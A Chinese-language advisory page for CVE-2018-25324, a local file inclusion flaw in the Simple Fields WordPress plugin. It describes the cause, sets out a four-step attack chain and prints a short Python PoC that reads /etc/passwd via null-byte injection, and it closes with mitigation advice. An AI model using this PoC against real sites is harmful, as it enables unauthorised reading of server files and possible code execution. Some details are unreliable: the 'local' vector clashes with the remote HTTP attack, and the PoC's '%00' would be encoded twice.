CVE-2018-25324 CVSS 6.2 中危

CVE-2018-25324 Simple Fields插件本地文件包含漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25324

漏洞类型

本地文件包含 (LFI)

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Simple Fields WordPress Plugin

漏洞概述

Simple Fields插件0.2至0.3.5版本存在本地文件包含漏洞。攻击者无需认证，通过向wp_abspath参数注入空字节（PHP<5.3.4），可读取服务器任意文件（如/etc/passwd）。若开启allow_url_include，还可结合日志 poisoning 实现远程代码执行，严重威胁服务器安全。

技术细节

该漏洞源于插件未对传入的wp_abspath参数进行严格过滤。在PHP 5.3.4之前版本，空字节（%00）可用于截断字符串。攻击者构造包含恶意路径（如/etc/passwd%00）的HTTP请求发送至simple_fields.php，程序调用include/require函数时，空字节导致后续扩展名被忽略，从而包含并执行指定文件。配合Apache日志注入，可进一步升级为RCE。

攻击链分析

STEP 1

侦察

识别目标WordPress站点是否安装Simple Fields插件且版本在0.2到0.3.5之间。

STEP 2

构造载荷

构造包含空字节注入的恶意URL参数wp_abspath，指向敏感文件（如/etc/passwd）。

STEP 3

发起攻击

向服务器发送HTTP GET请求，利用PHP旧版本空字节截断特性触发文件包含。

STEP 4

数据泄露或RCE

读取敏感文件内容；若allow_url_include开启，可包含日志文件实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2018-25324
import requests

target = "http://10.0.0.1/wp-content/plugins/simple-fields/simple_fields.php"
# Using null byte injection to read /etc/passwd
params = {"wp_abspath": "/etc/passwd%00"}

try:
    response = requests.get(target, params=params)
    if "root:" in response.text:
        print("[+] Exploit successful! File content leaked.")
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Simple Fields WordPress Plugin 0.2

Simple Fields WordPress Plugin 0.3.5

防御指南

临时缓解措施

建议立即卸载受影响版本的Simple Fields插件或升级至修复版本。暂时无法升级时，应严格限制Web目录权限，并确保PHP配置中禁用了allow_url_include功能，同时过滤wp_abspath参数以阻断空字节注入攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表